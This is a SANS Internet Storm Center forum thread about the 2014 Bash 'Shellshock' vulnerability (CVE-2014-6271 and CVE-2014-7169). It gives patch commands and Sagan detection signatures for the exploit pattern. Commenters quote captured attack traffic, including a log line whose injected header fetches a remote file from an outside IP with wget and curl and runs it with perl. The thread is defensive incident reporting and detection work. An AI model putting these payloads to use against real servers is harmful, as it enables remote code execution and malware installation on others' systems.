Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Attention *NIX admins, time to patch! - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Attention *NIX admins, time to patch!

Over the past years, we became used to Microsoft Patches, the important, critical ones that would render your system fully vulnerable if you didn't apply them. We probably became so used that sometime we forget that our Linux servers also need patches.

Today I've learned about a critical Bash patch, that addresses the CVE-2014-6271. According the advisory:

"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."

The patches are already ready for most of the Linux distros, like RedHat and Debian, so waste no time.

---

Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure

Pedro

155 Posts
ISC Handler
The good news is that it's an easy fix:

Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
Jac

69 Posts Posts
We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. This monitor bash history and Apache logs for attempts. More information can be found at:

https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Anonymous

Posts
Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223
Anonymous

Posts
Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:

https://access.redhat.com/articles/1200223
Anonymous

Posts
We've just started seeing scanning traffic using the following packet contents:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IP's. No logs at this time.
sludge3000

1 Posts Posts
You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125 which is (to me), obviously a host for malware sites and this sort of activity.

It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Steven C.

170 Posts Posts
Examples from my webserver log:

89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""


Shouldn't this rate setting the Threat Level to at least chartreuse?
John Hardin

62 Posts Posts

Sign Up for Free or Log In to start participating in the conversation!